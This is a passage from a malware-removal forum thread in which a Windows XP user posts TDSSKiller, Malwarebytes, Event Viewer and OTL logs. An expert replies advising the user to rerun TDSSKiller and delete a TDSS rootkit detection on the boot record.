20:32:34.0343 3536 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:32:34.0500 3536 Kbdclass - ok
20:32:34.0546 3536 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
20:32:34.0671 3536 kmixer - ok
20:32:34.0718 3536 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
20:32:34.0796 3536 KSecDD - ok
20:32:34.0828 3536 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
20:32:34.0906 3536 L8042pr2 - ok
20:32:34.0984 3536 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
20:32:35.0046 3536 lanmanserver - ok
20:32:35.0078 3536 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:32:35.0156 3536 lanmanworkstation - ok
20:32:35.0171 3536 lbrtfdc - ok
20:32:35.0203 3536 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
20:32:35.0359 3536 LmHosts - ok
20:32:35.0406 3536 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
20:32:35.0421 3536 LMouFlt2 - ok
20:32:35.0531 3536 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
20:32:35.0546 3536 McciCMService ( UnsignedFile.Multi.Generic ) - warning
20:32:35.0546 3536 McciCMService - detected UnsignedFile.Multi.Generic (1)
20:32:35.0578 3536 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
20:32:35.0765 3536 Messenger - ok
20:32:35.0796 3536 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
20:32:35.0953 3536 mnmdd - ok
20:32:35.0968 3536 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
20:32:36.0125 3536 mnmsrvc - ok
20:32:36.0171 3536 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
20:32:36.0328 3536 Modem - ok
20:32:36.0328 3536 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:32:36.0484 3536 Mouclass - ok
20:32:36.0531 3536 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:32:36.0671 3536 mouhid - ok
20:32:36.0687 3536 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
20:32:36.0859 3536 MountMgr - ok
20:32:36.0921 3536 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:32:36.0937 3536 MozillaMaintenance - ok
20:32:36.0953 3536 MpKsl08115bda - ok
20:32:36.0968 3536 mraid35x - ok
20:32:36.0984 3536 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
20:32:37.0015 3536 MREMP50 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0015 3536 MREMP50 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0046 3536 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
20:32:37.0062 3536 MREMPR5 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0062 3536 MREMPR5 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0093 3536 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
20:32:37.0109 3536 MRENDIS5 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0109 3536 MRENDIS5 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0140 3536 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
20:32:37.0140 3536 MRESP50 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0140 3536 MRESP50 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0140 3536 mrtRate - ok
20:32:37.0203 3536 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:32:37.0343 3536 MRxDAV - ok
20:32:37.0406 3536 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
20:32:37.0453 3536 MRxSmb - ok
20:32:37.0484 3536 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
20:32:37.0656 3536 MSDTC - ok
20:32:37.0671 3536 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
20:32:37.0828 3536 Msfs - ok
20:32:37.0843 3536 MSIServer - ok
20:32:37.0859 3536 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:32:38.0000 3536 MSKSSRV - ok
20:32:38.0015 3536 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:32:38.0156 3536 MSPCLOCK - ok
20:32:38.0171 3536 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
20:32:38.0328 3536 MSPQM - ok
20:32:38.0343 3536 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:32:38.0500 3536 mssmbios - ok
20:32:38.0546 3536 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
20:32:38.0578 3536 Mup - ok
20:32:38.0625 3536 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
20:32:38.0796 3536 napagent - ok
20:32:38.0843 3536 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
20:32:39.0000 3536 NDIS - ok
20:32:39.0031 3536 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:32:39.0109 3536 NdisTapi - ok
20:32:39.0140 3536 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:32:39.0296 3536 Ndisuio - ok
20:32:39.0328 3536 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:32:39.0484 3536 NdisWan - ok
20:32:39.0515 3536 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
20:32:39.0578 3536 NDProxy - ok
20:32:39.0625 3536 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:32:39.0625 3536 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
20:32:39.0625 3536 Net Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
20:32:39.0671 3536 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
20:32:39.0828 3536 NetBIOS - ok
20:32:39.0859 3536 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
20:32:40.0015 3536 NetBT - ok
20:32:40.0046 3536 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
20:32:40.0234 3536 NetDDE - ok
20:32:40.0234 3536 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
20:32:40.0406 3536 NetDDEdsdm - ok
20:32:40.0437 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
20:32:40.0593 3536 Netlogon - ok
20:32:40.0640 3536 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
20:32:40.0781 3536 Netman - ok
20:32:40.0828 3536 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:32:40.0843 3536 NetTcpPortSharing - ok
20:32:40.0875 3536 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:32:41.0031 3536 NIC1394 - ok
20:32:41.0078 3536 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
20:32:41.0125 3536 Nla - ok
20:32:41.0171 3536 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
20:32:41.0328 3536 Npfs - ok
20:32:41.0343 3536 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
20:32:41.0500 3536 Ntfs - ok
20:32:41.0515 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
20:32:41.0687 3536 NtLmSsp - ok
20:32:41.0734 3536 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
20:32:41.0890 3536 NtmsSvc - ok
20:32:41.0937 3536 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
20:32:42.0078 3536 Null - ok
20:32:42.0109 3536 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:32:42.0281 3536 NwlnkFlt - ok
20:32:42.0281 3536 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:32:42.0453 3536 NwlnkFwd - ok
20:32:42.0500 3536 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:32:42.0656 3536 ohci1394 - ok
20:32:42.0750 3536 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:32:42.0765 3536 ose - ok
20:32:42.0796 3536 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
20:32:42.0953 3536 Parport - ok
20:32:42.0968 3536 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
20:32:43.0125 3536 PartMgr - ok
20:32:43.0156 3536 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
20:32:43.0312 3536 ParVdm - ok
20:32:43.0359 3536 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
20:32:43.0515 3536 PCI - ok
20:32:43.0515 3536 PCIDump - ok
20:32:43.0531 3536 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
20:32:43.0687 3536 PCIIde - ok
20:32:43.0718 3536 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
20:32:43.0875 3536 Pcmcia - ok
20:32:43.0875 3536 PDCOMP - ok
20:32:43.0890 3536 PDFRAME - ok
20:32:43.0906 3536 PDRELI - ok
20:32:43.0906 3536 PDRFRAME - ok
20:32:43.0921 3536 perc2 - ok
20:32:43.0937 3536 perc2hib - ok
20:32:43.0984 3536 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
20:32:43.0984 3536 Pfc ( UnsignedFile.Multi.Generic ) - warning
20:32:43.0984 3536 Pfc - detected UnsignedFile.Multi.Generic (1)
20:32:44.0046 3536 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:32:44.0078 3536 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
20:32:44.0078 3536 Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
20:33:01.0234 3536 ================ Scan global ===============================
20:33:01.0265 3536 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
20:33:01.0296 3536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:33:01.0328 3536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:33:01.0359 3536 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
20:33:01.0359 3536 [Global] - ok
20:33:01.0359 3536 ================ Scan MBR ==================================
20:33:01.0390 3536 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
20:33:01.0609 3536 \Device\Harddisk0\DR0 ( TDSS File System ) - warning
20:33:01.0609 3536 \Device\Harddisk0\DR0 - detected TDSS File System (1)
20:33:01.0609 3536 ================ Scan VBR ==================================
20:33:01.0609 3536 [ 085D431551BA33298DDBA5C93B1F437B ] \Device\Harddisk0\DR0\Partition1
20:33:01.0625 3536 \Device\Harddisk0\DR0\Partition1 - ok
20:33:01.0625 3536 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
20:33:01.0625 3536 \Device\Harddisk0\DR0\Partition2 - ok
20:33:01.0625 3536 ============================================================
20:33:01.0625 3536 Scan finished
20:33:01.0625 3536 ============================================================
20:33:01.0734 2024 Detected object count: 13
20:33:01.0734 2024 Actual detected object count: 13
20:33:18.0171 2024 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 hpqcxs08 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 hpqcxs08 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 hpqddsvc ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 hpqddsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0171 2024 Iviaspi ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0171 2024 Iviaspi ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 McciCMService ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 McciCMService ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MREMP50 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MREMP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MREMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MREMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MRENDIS5 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MRENDIS5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 MRESP50 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 MRESP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0187 2024 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0187 2024 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 Pfc ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0203 2024 Pfc ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
20:33:18.0203 2024 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip

#7
RKinner

    Malware Expert

  • Expert
  • 24,624 posts
  • MVP
Run TDSSKiller again and tell it to Delete the TDSS File System:

20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
20:33:18.0203 2024 \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip

#8
goodseed

    Member

  • Topic Starter
  • Member
  • 49 posts
Malwarebytes Anti-Malware 1.70.0.1100
www.malwarebytes.org

Database version: v2013.01.19.01

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 8.0.6001.18702
Owner :: YOUR-46E94OWX6A [administrator]

1/18/2013 10:06:57 PM
mbam-log-2013-01-18 (22-06-57).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 246744
Time elapsed: 6 minute(s), 14 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

#9
goodseed

    Member

  • Topic Starter
  • Member
  • 49 posts
Vino's Event Viewer v01c run on Windows XP in English
Report run at 18/01/2013 10:46:34 PM

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 18/01/2013 10:24:11 PM
Type: error Category: 0
Event: 7023 Source: Service Control Manager
The HP CUE DeviceDiscovery Service service terminated with the following error: Unspecified error

Log: 'System' Date/Time: 18/01/2013 10:24:07 PM
Type: error Category: 0
Event: 7022 Source: Service Control Manager
The HP CUE DeviceDiscovery Service service hung on starting.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7001 Source: Service Control Manager
The AVG Free E-mail Scanner service depends on the AVG Free WatchDog service which failed to start because of the following error: The system cannot find the path specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The mrtRate service failed to start due to the following error: The system cannot find the file specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The AVG Free WatchDog service failed to start due to the following error: The system cannot find the path specified.

Log: 'System' Date/Time: 18/01/2013 10:22:43 PM
Type: error Category: 0
Event: 7000 Source: Service Control Manager
The SAS Core Service service failed to start due to the following error: The system cannot find the path specified.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#10
goodseed

    Member

  • Topic Starter
  • Member
  • 49 posts
OTL logfile created on: 1/18/2013 10:56:15 PM - Run 3
OTL by OldTimer - Version 3.2.31.0 Folder = C:\Documents and Settings\Owner\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 161.04 Mb Available Physical Memory | 32.00% Memory free
1.20 Gb Paging File | 0.67 Gb Available in Paging File | 55.53% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 75.04 Gb Free Space | 52.05% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2012/11/01 13:45:21 | 004,763,008 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
PRC - [2012/10/30 17:50:59 | 004,297,136 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2012/01/03 17:12:00 | 000,584,192 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\Desktop\OTL(1).exe
PRC - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/04/30 18:36:16 | 001,742,336 | ---- | M] (Alcatel-Lucent) -- C:\Program Files\Windstream_BCUC\McciTrayApp.exe
PRC - [2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
PRC - [2003/11/07 03:50:00 | 000,019,968 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\LOGI_MWX.EXE


========== Modules (No Company Name) ==========

MOD - [2013/01/10 21:16:48 | 003,021,872 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2012/12/17 01:22:00 | 002,040,320 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\defs\12121700\algo.dll
MOD - [2011/07/28 17:09:42 | 000,096,112 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2009/12/20 19:42:16 | 000,176,235 | ---- | M] () -- C:\WINDOWS\system32\Primomonnt.dll
MOD - [2008/04/13 18:11:59 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- -- (HidServ)
SRV - File not found [Auto | Stopped] -- -- (avg9wd)
SRV - File not found [Auto | Stopped] -- -- (avg9emc)
SRV - File not found [On_Demand | Stopped] -- -- (AppMgmt)
SRV - File not found [Auto | Stopped] -- -- (!SASCORE)
SRV - [2013/01/10 21:16:50 | 000,115,760 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)


========== Driver Services (SafeList) ==========

DRV - [2012/10/30 17:51:58 | 000,738,504 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2012/10/30 17:51:58 | 000,361,032 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2012/10/30 17:51:58 | 000,054,232 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2012/10/30 17:51:58 | 000,035,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)
DRV - [2012/10/30 17:51:57 | 000,097,608 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2012/10/30 17:51:56 | 000,025,256 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2012/10/30 17:51:56 | 000,021,256 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2011/07/22 10:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 15:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2010/06/30 02:27:08 | 000,049,904 | R--- | M] (Avanquest Software) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\BVRPMPR5.SYS -- (BVRPMPR5)
DRV - [2010/04/30 18:32:06 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2010/04/30 18:30:56 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2009/05/14 14:20:02 | 000,030,656 | ---- | M] (Eutron) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\eusk2par.sys -- (eusk2par)
DRV - [2005/12/12 17:27:00 | 000,019,072 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\PS2.sys -- (Ps2)
DRV - [2004/11/22 17:36:40 | 000,018,003 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRENDIS5.sys -- (MRENDIS5)
DRV - [2004/11/22 17:36:34 | 000,019,345 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMPR5.sys -- (MREMPR5)
DRV - [2004/06/29 09:07:18 | 001,268,204 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2004/05/12 03:36:50 | 000,043,672 | ---- | M] (Oak Technology Inc.) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\AFS2K.SYS -- (AFS2K)
DRV - [2004/05/05 07:02:12 | 002,155,200 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2004/01/02 21:05:48 | 000,011,520 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\srvkp.sys -- (SiSkp)
DRV - [2004/01/02 20:20:40 | 000,432,000 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sisgrp.sys -- (SiS315)
DRV - [2003/12/02 19:23:20 | 000,142,336 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\fasttx2k.sys -- (fasttx2k)
DRV - [2003/11/07 03:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 03:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/09/19 00:47:00 | 000,010,368 | ---- | M] (Padus, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\pfc.sys -- (Pfc)
DRV - [2003/07/18 17:58:20 | 000,036,992 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\SISAGPX.sys -- (SISAGP)
DRV - [2003/07/02 12:42:00 | 000,027,904 | ---- | M] (VIA Technologies, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\System32\DRIVERS\viaagp1.sys -- (viaagp1)
DRV - [2002/10/04 18:04:10 | 000,046,976 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\R8139n51.sys -- (rtl8139)


========== Standard Registry (SafeList) ==========


